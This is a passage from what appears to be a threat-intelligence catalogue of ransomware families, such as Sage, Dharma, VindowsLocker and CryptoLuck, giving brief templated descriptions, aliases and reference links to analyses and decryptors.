<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/petya-ransomware-returns-with-goldeneye-version-continuing-james-bond-theme/">https://www.bleepingcomputer.com/news/security/petya-ransomware-returns-with-goldeneye-version-continuing-james-bond-theme/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/634778/golden-eye-virus/">https://www.bleepingcomputer.com/forums/t/634778/golden-eye-virus/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sage_ransomware"><a class="anchor" href="#_sage_ransomware"></a><a class="link" href="#_sage_ransomware">Sage Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc…</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1819. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/sage-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/sage-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/634978/sage-file-sample-extension-sage/">https://www.bleepingcomputer.com/forums/t/634978/sage-file-sample-extension-sage/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/634747/sage-20-ransomware-sage-support-help-topic/">https://www.bleepingcomputer.com/forums/t/634747/sage-20-ransomware-sage-support-help-topic/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sq_ransomware"><a class="anchor" href="#_sq_ransomware"></a><a class="link" href="#_sq_ransomware">SQ_ Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… This hacker requests 4 bitcoins for ransom.</p>
</div>
<div class="paragraph">
<p>SQ_ Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>VO_ Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1820. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/sq-vo-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/sq-vo-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_matrix"><a class="anchor" href="#_matrix"></a><a class="link" href="#_matrix">Matrix</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc…</p>
</div>
<div class="paragraph">
<p>Matrix is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Malta Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1821. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-2nd-2016-screenlockers-kangaroo-the-sfmta-and-more/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-2nd-2016-screenlockers-kangaroo-the-sfmta-and-more/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/12/matrix-ransomware.html">https://id-ransomware.blogspot.co.il/2016/12/matrix-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/rommeljoven17/status/804251901529231360">https://twitter.com/rommeljoven17/status/804251901529231360</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_satan666_ransomware"><a class="anchor" href="#_satan666_ransomware"></a><a class="link" href="#_satan666_ransomware">Satan666 Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1822. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/satan666-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/satan666-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rip_phoenix_ransomware"><a class="anchor" href="#_rip_phoenix_ransomware"></a><a class="link" href="#_rip_phoenix_ransomware">RIP (Phoenix) Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1823. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/rip-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/rip-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/804810315456200704">https://twitter.com/BleepinComputer/status/804810315456200704</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_locked_in_ransomware_or_novalid_ransomware"><a class="anchor" href="#_locked_in_ransomware_or_novalid_ransomware"></a><a class="link" href="#_locked_in_ransomware_or_novalid_ransomware">Locked-In Ransomware or NoValid Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on RemindMe</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1824. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/novalid-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/novalid-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/634754/locked-in-ransomware-help-support-restore-corupted-fileshtml/">https://www.bleepingcomputer.com/forums/t/634754/locked-in-ransomware-help-support-restore-corupted-fileshtml/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/807169774098796544">https://twitter.com/struppigel/status/807169774098796544</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_chartwig_ransomware"><a class="anchor" href="#_chartwig_ransomware"></a><a class="link" href="#_chartwig_ransomware">Chartwig Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1825. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/chartwig-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/chartwig-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_renlocker_ransomware_fake"><a class="anchor" href="#_renlocker_ransomware_fake"></a><a class="link" href="#_renlocker_ransomware_fake">RenLocker Ransomware (FAKE)</a></h3>
<div class="paragraph">
<p>It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The files dont actually get encrypted, their names get changed using this formula: <span class="www-hash-part-">[number]</span>[.crypter]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1826. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/renlocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/renlocker-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_thanksgiving_ransomware"><a class="anchor" href="#_thanksgiving_ransomware"></a><a class="link" href="#_thanksgiving_ransomware">Thanksgiving Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1827. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/thanksgiving-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/thanksgiving-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/07/stampado-ransomware-1.html">https://id-ransomware.blogspot.co.il/2016/07/stampado-ransomware-1.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/801486420368093184">https://twitter.com/BleepinComputer/status/801486420368093184</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cockblocker_ransomware"><a class="anchor" href="#_cockblocker_ransomware"></a><a class="link" href="#_cockblocker_ransomware">CockBlocker Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1828. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/cockblocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/cockblocker-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/jiriatvirlab/status/801910919739674624">https://twitter.com/jiriatvirlab/status/801910919739674624</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lomix_ransomware"><a class="anchor" href="#_lomix_ransomware"></a><a class="link" href="#_lomix_ransomware">Lomix Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on the idiotic open-source ransomware called CryptoWire</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1829. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/lomix-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/lomix-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/siri_urz/status/801815087082274816">https://twitter.com/siri_urz/status/801815087082274816</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ozozalocker_ransomware"><a class="anchor" href="#_ozozalocker_ransomware"></a><a class="link" href="#_ozozalocker_ransomware">OzozaLocker Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. <a href="https://3.bp.blogspot.com/--jubfYRaRmw/WDaOyZXkAaI/AAAAAAAACQE/E63a4FnaOfACZ07s1xUiv_haxy8cp5YCACLcB/s1600/ozoza2.png" class="bare">https://3.bp.blogspot.com/--jubfYRaRmw/WDaOyZXkAaI/AAAAAAAACQE/E63a4FnaOfACZ07s1xUiv_haxy8cp5YCACLcB/s1600/ozoza2.png</a></p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1830. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/ozozalocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/ozozalocker-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/ozozalocker">https://decrypter.emsisoft.com/ozozalocker</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/801503401867673603">https://twitter.com/malwrhunterteam/status/801503401867673603</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crypute_ransomware"><a class="anchor" href="#_crypute_ransomware"></a><a class="link" href="#_crypute_ransomware">Crypute Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>Crypute Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>m0on Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1831. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/crypute-ransomware-m0on.html">https://id-ransomware.blogspot.co.il/2016/11/crypute-ransomware-m0on.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/virus-removal/threat/ransomware/">https://www.bleepingcomputer.com/virus-removal/threat/ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nmoreira_ransomware"><a class="anchor" href="#_nmoreira_ransomware"></a><a class="link" href="#_nmoreira_ransomware">NMoreira Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>NMoreira Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Fake Maktub Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1832. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/nmoreira-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/nmoreira-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/airacrop-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/airacrop-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vindowslocker_ransomware"><a class="anchor" href="#_vindowslocker_ransomware"></a><a class="link" href="#_vindowslocker_ransomware">VindowsLocker Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom amount is 349.99$ and the hacker seems to be from India. He disguises himself as Microsoft Support.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1833. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/vindowslocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/vindowslocker-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://malwarebytes.app.box.com/s/gdu18hr17mwqszj3hjw5m3sw84k8hlph">https://malwarebytes.app.box.com/s/gdu18hr17mwqszj3hjw5m3sw84k8hlph</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://rol.im/VindowsUnlocker.zip">https://rol.im/VindowsUnlocker.zip</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/800729944112427008">https://twitter.com/JakubKroustek/status/800729944112427008</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/vindowslocker-ransomware-mimics-tech-support-scam-not-the-other-way-around/">https://www.bleepingcomputer.com/news/security/vindowslocker-ransomware-mimics-tech-support-scam-not-the-other-way-around/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_donald_trump_2_ransomware"><a class="anchor" href="#_donald_trump_2_ransomware"></a><a class="link" href="#_donald_trump_2_ransomware">Donald Trump 2 Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Here is the original ransomware under this name: <a href="http://id-ransomware.blogspot.co.il/2016/09/donald-trump-ransomware.html" class="bare">http://id-ransomware.blogspot.co.il/2016/09/donald-trump-ransomware.html</a></p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1834. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://id-ransomware.blogspot.co.il/2016/09/donald-trump-ransomware.html">http://id-ransomware.blogspot.co.il/2016/09/donald-trump-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-donald-trump-ransomware-tries-to-build-walls-around-your-files/">https://www.bleepingcomputer.com/news/security/the-donald-trump-ransomware-tries-to-build-walls-around-your-files/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nagini_ransomware"><a class="anchor" href="#_nagini_ransomware"></a><a class="link" href="#_nagini_ransomware">Nagini Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Looks for C:\Temp\voldemort.horcrux</p>
</div>
<div class="paragraph">
<p>Nagini Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Voldemort Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1835. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://id-ransomware.blogspot.co.il/2016/09/nagini-voldemort-ransomware.html">http://id-ransomware.blogspot.co.il/2016/09/nagini-voldemort-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-nagini-ransomware-sics-voldemort-on-your-files/">https://www.bleepingcomputer.com/news/security/the-nagini-ransomware-sics-voldemort-on-your-files/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shelllocker_ransomware"><a class="anchor" href="#_shelllocker_ransomware"></a><a class="link" href="#_shelllocker_ransomware">ShellLocker Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1836. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/shelllocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/shelllocker-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/799388289337671680">https://twitter.com/JakubKroustek/status/799388289337671680</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_chip_ransomware"><a class="anchor" href="#_chip_ransomware"></a><a class="link" href="#_chip_ransomware">Chip Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>Chip Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ChipLocker Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1837. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/chip-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/chip-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware-traffic-analysis.net/2016/11/17/index.html">http://malware-traffic-analysis.net/2016/11/17/index.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/rig-e-exploit-kit-now-distributing-new-chip-ransomware/">https://www.bleepingcomputer.com/news/security/rig-e-exploit-kit-now-distributing-new-chip-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dharma_ransomware"><a class="anchor" href="#_dharma_ransomware"></a><a class="link" href="#_dharma_ransomware">Dharma Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS &gt; Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: <a href="mailto:bitcoin143@india.com">bitcoin143@india.com</a>. CrySiS variant</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1838. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/">https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_angela_merkel_ransomware"><a class="anchor" href="#_angela_merkel_ransomware"></a><a class="link" href="#_angela_merkel_ransomware">Angela Merkel Ransomware</a></h3>
<div class="paragraph">
<p>Its directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1839. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/angela-merkel-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/angela-merkel-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/798268218364358656">https://twitter.com/malwrhunterteam/status/798268218364358656</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cryptoluck_ransomware"><a class="anchor" href="#_cryptoluck_ransomware"></a><a class="link" href="#_cryptoluck_ransomware">CryptoLuck Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>CryptoLuck Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>YafunnLocker</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1840. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/cryptoluck-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/cryptoluck-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/">http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwareforme/status/798258032115322880">https://twitter.com/malwareforme/status/798258032115322880</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_crypton_ransomware"><a class="anchor" href="#_crypton_ransomware"></a><a class="link" href="#_crypton_ransomware">Crypton Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>Crypton Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Nemesis</p>
</li>
<li>
<p>X3M</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1841. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/crypton-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/crypton-ransomware.html</a></p></td>
</tr>
<tr>
